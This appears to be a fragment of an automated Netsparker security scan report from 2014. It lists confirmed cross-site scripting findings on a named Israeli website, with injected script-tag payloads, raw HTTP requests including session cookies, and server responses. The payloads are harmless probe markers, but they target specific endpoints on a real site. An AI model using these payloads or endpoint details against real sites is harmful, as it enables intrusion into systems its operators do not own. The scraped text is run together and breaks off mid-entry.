404;http://www.shalomlaam.co.il:80/page/odot/'"-->netsparker(0x0004E2)script>style>netsparker(0x000534) HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:12 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 174Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/?'"-->netsparker(0x000534)script>style>
RequestGET /reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D5)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:03 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/reg/maillingUpdate.asp'"-->netsparker(0x0001D5)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 175Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/'"-->netsparker(0x0004A9)script>style>netsparker(0x000234)script>style>
3.72. /maillingUpdate.asp CONFIRMEDhttp://www.shalomlaam.co.il/maillingUpdate.asp?'"-->alert(0x000218)
ParametersParameter Type Value
Query Based Query String '"-->alert(0x000218)
RequestGET /maillingUpdate.asp?'"-->netsparker(0x000218) HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:36 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 179Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/maillingUpdate.asp?'"-->netsparker(0x000218)script>style>
RequestGET /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:15 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/home/'"-->netsparker(0x00010D)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:59:54 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 184Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/bmidrash/answer.asp'"-->netsparker(0x00037E)script>style>netsparker(0x0001AF)script>style>
3.79. /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x000156)
RequestGET /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:52 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/alon/list.asp'"-->netsparker(0x000156)script>style>
3.81. /about/reg/ CONFIRMEDhttp://www.shalomlaam.co.il/about/reg/?'"-->alert(0x0004FE)
ParametersParameter Type Value
Query Based Query String '"-->alert(0x0004FE)
RequestGET /about/reg/?'"-->netsparker(0x0004FE) HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 171Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/reg/?'"-->netsparker(0x0004FE)script>style>
3.83. /js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea
Top Related